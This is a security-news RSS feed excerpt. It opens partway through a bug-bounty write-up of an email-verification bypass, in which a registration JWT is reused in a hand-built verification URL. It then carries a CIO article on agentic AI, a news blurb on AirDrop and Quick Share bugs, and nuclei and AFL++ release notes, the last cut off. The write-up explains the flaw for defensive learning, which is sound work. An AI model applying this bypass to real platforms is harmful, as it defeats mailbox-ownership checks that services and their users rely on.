email?</em></strong></blockquote><p>The only way to answer that question was to test it.</p><p>So I registered another account.</p><h3>Testing the Hypothesis</h3><p>Rather than clicking the verification link from the email, I decided to repeat the registration process using another temporary email address.</p><p>The goal was simple.</p><p>Could I verify the account <strong>without ever opening the verification email?</strong></p><p>After registering the second account, I watched the registration response again and copied the JWT returned by the API.</p><p>This time, I completely ignored the inbox.</p><p>Instead, I manually constructed the verification URL using the same format I had seen in the email.</p><pre>https://[REDACTED]/verify-email?token=&lt;JWT&gt;</pre><p>I pasted the URL into the browser and pressed <strong>Enter</strong>.</p><p>The account was verified immediately.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1005/1*lXoPupxtJt_dVZM8my35EQ.png"></figure><p>At that point, the hypothesis was confirmed.</p><p>The verification email wasn’t actually required.</p><p>As long as the registration response exposed the same JWT used by the verification endpoint, anyone registering an account already possessed everything needed to verify it.</p><p>The email merely contained information the client had already received.</p><h3>Why This Happened</h3><p>It’s important to point out that the problem wasn’t JWT itself.</p><p>JWT (JSON Web Token) is widely used across modern web applications for authentication and securely transmitting signed information between systems.</p><p>Returning a JWT after registration is also not inherently insecure. Many applications automatically sign users in immediately after creating an account.</p><p>The issue here was much simpler.</p><p>The application reused the same token for two different purposes.</p><p>The JWT returned by the registration API was also accepted by the email verification endpoint.</p><p>As a result, the verification email stopped being the source of trust.</p><p>Instead of proving ownership of the mailbox, the application trusted information that had already been provided during registration.</p><p>In other words, email verification became an optional step rather than a security control.</p><h3>How Email Verification Should Work</h3><p>The goal of email verification is simple:</p><blockquote><strong><em>Prove that the person creating the account actually has access to the registered email address.</em></strong></blockquote><p>A typical email verification flow looks like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*whQMLQnLINsaqU2NX6hJRg.png"></figure><p>Notice where the verification token comes from.</p><p>The <strong>only intended source</strong> of the verification token is the user’s inbox. If someone can’t access the mailbox, they shouldn’t be able to obtain the token, and therefore shouldn’t be able to verify the account.</p><p>Now compare that with what happened in this case.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GBfUMfkTKVJf_vJdJBXI7A.png"></figure><p>Instead of acting as proof of email ownership, the verification email simply duplicated information that had already been exposed during registration.</p><p>Once that happened, the verification process no longer answered its original security question:</p><blockquote><strong><em>“Does this user actually control the registered mailbox?”</em></strong></blockquote><p>Instead, it became:</p><blockquote><strong><em>“Does this user still have the JWT that was already returned during registration?”</em></strong></blockquote><p>Those are two very different security guarantees.</p><h3>Security Impact</h3><p>At first glance, this might look like a minor implementation mistake.</p><p>After all, the attacker is only verifying their own account.</p><p>However, the real issue is the broken trust model.</p><p>Once the application accepts a verification token that users already possess, it no longer verifies ownership of the email address.</p><p>That can have several consequences depending on how the platform uses verified email addresses.</p><p>For example:</p><ul><li>Users can verify accounts without ever accessing the registered mailbox.</li><li>Fake or disposable email addresses become much easier to use.</li><li>Any feature that assumes a verified email belongs to its owner can no longer rely on that assumption.</li><li>Future workflows built on the “verified” status inherit the same broken trust model.</li></ul><p>The impact ultimately depends on the application.</p><p>Some platforms only use email verification to reduce spam.</p><p>Others use it as a prerequisite for password recovery, identity checks, invitations, financial transactions, or access to sensitive features.</p><p>Regardless of the specific implementation, the underlying guarantee remains the same:</p><p>A verified email address should mean the user has demonstrated ownership of that mailbox.</p><p>In this case, that guarantee no longer existed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ahXgX05n8sg4CuATu5YswQ.png"></figure><h3>Lessons Learned</h3><p>One thing I enjoy about application security is that interesting findings don’t always come from sophisticated techniques.</p><p>This wasn’t the result of automated scanning.</p><p>It wasn’t discovered with Burp Suite extensions, custom tooling, or fuzzing.</p><p>In fact, the only tools I used were:</p><ul><li>A web browser</li><li>Chrome DevTools</li><li>A temporary email service</li><li>Curiosity</li></ul><p>The vulnerability wasn’t hidden behind dozens of requests or a complicated authentication flow.</p><p>It was visible in plain sight.</p><p>All it took was slowing down, observing the application’s behavior, and asking a simple question:</p><blockquote><strong><em>Do I actually need the verification email?</em></strong></blockquote><p>That question led to a business logic flaw that made email verification optional.</p><p>It’s a good reminder that application security isn’t always about finding clever payloads or bypassing complex filters.</p><p>Sometimes it’s about understanding what a feature is supposed to achieve, then verifying whether the implementation actually delivers that security guarantee.</p><h3>Final Thoughts</h3><p>As developers, we often focus on whether a feature works.</p><p>As security researchers, we also need to ask whether it works <strong>securely</strong>.</p><p>In this case, the registration flow appeared to function perfectly.</p><p>Users received a verification email.</p><p>The verification link worked.</p><p>Accounts became verified.</p><p>From a functional perspective, everything looked correct.</p><p>From a security perspective, however, the email had stopped serving its original purpose. The application trusted a token that had already been exposed during registration, making the inbox irrelevant to the verification process.</p><p>This is exactly why business logic vulnerabilities can be so easy to miss.</p><p>Nothing crashes.</p><p>No error messages appear.</p><p>No scanners raise an alert.</p><p>The application behaves exactly as expected — until someone asks whether the security assumption behind the feature still holds.</p><p>Thanks for reading!</p><p>If you’re a developer, I hope this write-up encourages you to look beyond whether a feature works and think about what security guarantee it’s supposed to provide.</p><p>And if you’re interested in bug bounty or application security, remember that you don’t always need advanced tools to find meaningful vulnerabilities.</p><p>Sometimes, Chrome DevTools, careful observation, and a bit of curiosity are more than enough.</p><p>Happy hacking! 🚀</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=6ad76663b658" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-found-an-email-verification-bypass-on-an-ai-freelance-platform-6ad76663b658">How I Found an Email Verification Bypass on an AI Freelance Platform</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 ways to ensure effective digital leadership in the age of agentic AI]]></title>
<description><![CDATA[Research suggests pioneering CIOs must blend AI agents with human skills. So how can digital leaders establish an effective balance between agentic and professional capabilities, and successfully lead their people into the agentic-enabled future? Here are seven best-practice tips from the experts...]]></description>
<link>https://tsecurity.de/de/3638077/it-security-nachrichten/7-ways-to-ensure-effective-digital-leadership-in-the-age-of-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638077/it-security-nachrichten/7-ways-to-ensure-effective-digital-leadership-in-the-age-of-agentic-ai/</guid>
<pubDate>Wed, 01 Jul 2026 12:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Research suggests <a href="https://www.cio.com/article/4172555/how-it-teams-are-putting-ai-agents-to-work.html">pioneering CIOs must blend AI agents with human skills</a>. So how can digital leaders establish an effective balance between agentic and professional capabilities, and successfully lead their people into the agentic-enabled future? Here are seven best-practice tips from the experts.</p>



<p><strong>1. Get past the fear. </strong>Huy Dao, director of data and ML platform at Booking.com, says the travel specialist’s data stack makes it easier to develop new AI-enabled services, including a partner-to-guest agentic system for automated communication between customers and hotels.</p>



<p>The firm’s stack includes AWS cloud technology, the Snowflake data platform, ThoughtSpot analytics, and Astronomer orchestration. Dao’s data team also uses the MCP pioneered by Anthropic, the open-source agentic framework LangGraph, and a flexible approach to LLMs.</p>



<p>Dao now has a strong data platform for AI exploration, and he encourages other digital leaders to get involved. “As a business, we must think about how to prepare and ensure our data is ready for agents,” he says. “If your organization is still skeptical about AI, I’d say they should get past that fear because the potential is real.”</p>



<p><strong>2. Focus on amplification. </strong>Ankur Anand, CIO at recruitment specialist Harvey Nash, says effective digital leaders will treat AI agents as a new layer of cognitive infrastructure that amplifies human expertise. He says <a href="https://www.noemamag.com/the-mythology-of-conscious-ai/" rel="nofollow">research from thinkers like Anil Seth</a> shows intelligence relies on prediction, interpretation, and context. AI agents excel at the first two, but still depend on human judgment to create meaning. Digital leaders should design operating models in which humans set direction, and agents execute at scale, speed, and precision.</p>



<p>“CIOs can lead their people into an agentic‑enabled future by setting a clear purpose, building trust through governance, and redesigning work around hybrid human‑agent workflows,” Anand says. “They should define decision rights, approved data sources, and guardrails so agents operate transparently and safely, while people retain accountability and oversight.”</p>



<p><strong>3. Make people feel empowered. </strong>Ewa Zborowska, research director at tech analyst IDC, says agents are great at automating a discrete task, such as tidying up email replies and allowing professionals to focus on more creative tasks. But things get more challenging when firms join agents together to complete complex, multi-step tasks.</p>



<p>“A lot of organizations see an opportunity to introduce agents, but they also realize it’s not going to be something they can do overnight,” she says. “CIOs will often need agents to work across the full business process, which means understanding how everything works. They’ll need to map the process and ensure they introduce agents in all the right places.”</p>



<p>Zborowska says effective mapping requires careful thought about the people who run those processes, so professionals today aren’t left feeling irrelevant tomorrow. “There’s a huge question about how you manage agents successfully,” she says. “You need to make staff feel empowered with this new technology you’re introducing.”</p>



<p><strong>4. Guide staff maturely. </strong>Richard Corbridge, CIO at property specialist Segro, says his organization builds <a href="https://www.cio.com/article/4164331/how-cios-use-ai-agents-to-accelerate-revenue-growth.html?utm=hybrid_search">agent capability</a> on a maturity scale. First, they consider AI-enabled processes where the human stays in the loop, and then consider the risks of removing them.</p>



<p>Corbridge says this nuanced approach is crucial because agentic features are included in almost every tech product. He refers to Microsoft Copilot, saying most of Segro’s staff use the tool at least 10 times a day to help them operate more productively.</p>



<p>The general direction of travel, he says, should be to guide people and show how agents can help professionals create additional value. “One of our directors said writing with Copilot is like having a super-intelligent colleague next to you the entire time you’re working,” he says.</p>



<p><strong>5.</strong> <strong>Work with external experts.</strong> Joel Hron, CTO at global content and technology specialist Thomson Reuters, has helped his organization launch Trust in AI Alliance, a forum of senior AI researchers from Anthropic, AWS, Google Cloud, OpenAI, and Thomson Reuters, to discuss building confidence in agentic AI.</p>



<p>Having already led Thomson Reuters’ development of the AI-powered legal research tool Westlaw Advantage, and the firm’s Deep Research agent that reviews insights and strategizes like a researcher, Hron is eager to do more, and that’s where the Alliance comes in.</p>



<p>“Their goal is to exceed human-level performance in all areas of their models,” he says. “Given that we have some of the hardest human judgment-oriented challenges to solve, our work is a good litmus test for how good the models are, and we’ve actually supported many of these companies in terms of evaluating their models over the last three years.”</p>



<p><strong>6.</strong> <strong>Have tough conversations.</strong> Nick Pearson, European CIO at technology specialist Ricoh Europe, says digital leaders must watch how technology companies push agentic solutions.</p>



<p>“Any CIO will tell you they’ve got vendors that are desperate to partner with them, which is great, but they’re also <a href="https://www.cio.com/article/4101736/meet-the-maestro-ai-agents-are-ending-multi-cloud-vendor-lock-in.html?utm=hybrid_search">desperate to tie clients in</a>,” he says. “As digital leaders, we’ve got to be careful about how we manage these relationships, and we’re all reflecting on long-term agreements that tie us into a current way of working.”</p>



<p>Pearson’s explorations show that agentic AI can create value. Great digital leaders will steer the business toward these positive results, without being waylaid by FOMO. “We need to look at those tools and see if it’s just a nice thing to have, a hygiene factor, or really adding value — and we’re still having those debates,” he says.</p>



<p><strong>7. Don’t get left behind.</strong> Thierry Martin, head of enterprise data and analytics at Toyota Motor Europe, says CIOs must take an engaged approach to agents. While generative technologies like ChatGPT and Copilot can help shortcut laborious tasks, he believes agents offer a bigger boon.</p>



<p>Toyota Europe employees use the Snowflake Intelligence agent to find and exploit enterprise knowledge using natural language. LOB employees can use the technology to generate insights, such as finding regional demands for vehicle specifications, much more rapidly.</p>



<p>Martin is impressed with the results and says other digital leaders should start testing agents as soon as possible. “The priority is to understand AI, and try to get ahead,” he says. “I think that’s the key to success because the pace of change just gets faster.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple AirDrop and Quick Share Vulnerabilities Allow Attackers to Crash Devices]]></title>
<description><![CDATA[Multiple newly disclosed vulnerabilities in Apple’s AirDrop and Google/Samsung Quick Share proximity-sharing protocols allow attackers within wireless range to crash or disrupt nearby devices without user interaction repeatedly. Security researchers from CISPA Helmholtz Center for Information Sec...]]></description>
<link>https://tsecurity.de/de/3636175/it-security-nachrichten/multiple-airdrop-and-quick-share-vulnerabilities-allow-attackers-to-crash-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636175/it-security-nachrichten/multiple-airdrop-and-quick-share-vulnerabilities-allow-attackers-to-crash-devices/</guid>
<pubDate>Tue, 30 Jun 2026 18:09:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Multiple newly disclosed vulnerabilities in Apple’s AirDrop and Google/Samsung Quick Share proximity-sharing protocols allow attackers within wireless range to crash or disrupt nearby devices without user interaction repeatedly. Security researchers from CISPA Helmholtz Center for Information Security conducted a systematic reverse-engineering and protocol-aware fuzzing study of AirDrop and Quick Share across macOS, iOS, Android, and […]</p>
<p>The post <a href="https://cybersecuritynews.com/airdrop-and-quick-share-vulnerabilities/">Multiple AirDrop and Quick Share Vulnerabilities Allow Attackers to Crash Devices</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.10.0]]></title>
<description><![CDATA[What's Changed
🎉 New Features

Added per-host HTTP client pooling by @Mzack9999 in #7301

🐞 Bug Fixes

Fixed handling in hosterrorscache to automatically skip hosts that consistently time out by @knakul853 in #7455
Fixed preservation of explicit target port in network templates (fixes #7323) by @...]]></description>
<link>https://tsecurity.de/de/3635430/it-security-tools/v3100/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635430/it-security-tools/v3100/</guid>
<pubDate>Tue, 30 Jun 2026 13:33:11 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<h3>🎉 New Features</h3>
<ul>
<li>Added per-host HTTP client pooling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136122067" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7301" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7301/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7301">#7301</a></li>
</ul>
<h3>🐞 Bug Fixes</h3>
<ul>
<li>Fixed handling in hosterrorscache to automatically skip hosts that consistently time out by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625642707" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7455" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7455/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7455">#7455</a></li>
<li>Fixed preservation of explicit target port in network templates (fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193434012" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7323" data-hovercard-type="issue" data-hovercard-url="/projectdiscovery/nuclei/issues/7323/hovercard" href="https://github.com/projectdiscovery/nuclei/issues/7323">#7323</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4674940669" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7465" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7465/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7465">#7465</a></li>
<li>Fixed connection reuse and improved port pre-flight handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3742629949" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6715" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6715/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6715">#6715</a></li>
<li>Fixed code template signature validation before DAST loading by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700411528" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7472" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7472/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7472">#7472</a></li>
<li>Fixed gating of MySQL allowAllFiles option to require <code>-lfa</code> flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700411763" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7473" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7473/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7473">#7473</a></li>
<li>Fixed ASCII-section regex to properly escape literal <code>.</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702795464" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7476/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7476">#7476</a></li>
<li>Fixed recording of decoded bytes for debug dumps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702868000" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7478" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7478/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7478">#7478</a></li>
<li>Fixed proper escaping of dbname in lib/pq URLs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707305002" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7479" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7479/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7479">#7479</a></li>
<li>Fixed network policy enforcement prior to LDAP dialing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716406586" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7494" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7494/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7494">#7494</a></li>
<li>Fixed normalization and rejection of trace file DSN options in Oracle by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707423201" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7480" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7480/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7480">#7480</a></li>
<li>Fixed proper escaping of MSSQL database names in connection URLs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707534902" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7481" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7481/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7481">#7481</a></li>
<li>Fixed krbforge to reject unsandboxed ccache writes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4708196803" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7482/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7482">#7482</a></li>
<li>Fixed rejection of request-condition(s) during fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676212647" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7466" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7466/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7466">#7466</a></li>
<li>Fixed: YAML now correctly rejects recursive include chains by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715165100" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7492" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7492/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7492">#7492</a></li>
<li>Fixed resource leaks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4739223018" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7502" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7502/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7502">#7502</a></li>
</ul>
<h3>Other Changes</h3>
<ul>
<li>Updated govaluate dependency to prevent slice-bounds panic on invalid UTF-8 input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664829426" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7464" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7464/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7464">#7464</a></li>
<li>Updated goja dependency by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692928412" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7467" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7467/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7467">#7467</a></li>
<li>Updated dependencies to remove unused packages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626903870" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7457" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7457/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7457">#7457</a></li>
<li>Refactored templates to centralize opt-in capability gating by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4711432414" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7489" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7489/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7489">#7489</a></li>
<li>Added fuzzing parser harnesses for raw requests and templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628070192" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7459" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7459/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7459">#7459</a></li>
<li>Refactored template rendering boundary by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729885007" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7499" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7499/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7499">#7499</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XananasX7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XananasX7">@XananasX7</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4674940669" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7465" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7465/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7465">#7465</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snicket2100/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snicket2100">@snicket2100</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702795464" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7476/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7476">#7476</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/projectdiscovery/nuclei/compare/v3.9.0...v3.10.0"><tt>v3.9.0...v3.10.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v5.02c]]></title>
<description><![CDATA[Version ++5.02c (release)
!!! You need to recompile persistent mode/LLVMFuzzerTestOneInput target !!!

afl-health:

new tool: AFL++ campaign health tool checker, much more advanced than
afl-whatsup, with tips, analysis and ssh support


afl-fuzz:

Futex implementation missed the clean-up of the s...]]></description>
<link>https://tsecurity.de/de/3632450/it-security-tools/v502c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632450/it-security-tools/v502c/</guid>
<pubDate>Mon, 29 Jun 2026 11:19:12 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++5.02c (release)</h3>
<p>!!! You need to recompile persistent mode/LLVMFuzzerTestOneInput target !!!</p>
<ul>
<li>afl-health:
<ul>
<li>new tool: AFL++ campaign health tool checker, much more advanced than<br>
afl-whatsup, with tips, analysis and ssh support</li>
</ul>
</li>
<li>afl-fuzz:
<ul>
<li>Futex implementation missed the clean-up of the shmem</li>
<li>Futex shmem now lives in general shared memory map as by default only<br>
32 such regions are supported in MacOS</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>new C11 mode (<code>AFL_LLVM_C11</code> at compile time): afl-cc records each<br>
function's local variable count and afl-fuzz uses it as an extra queue<br>
scheduling signal to favor more complex code paths. Noticably improvement,<br>
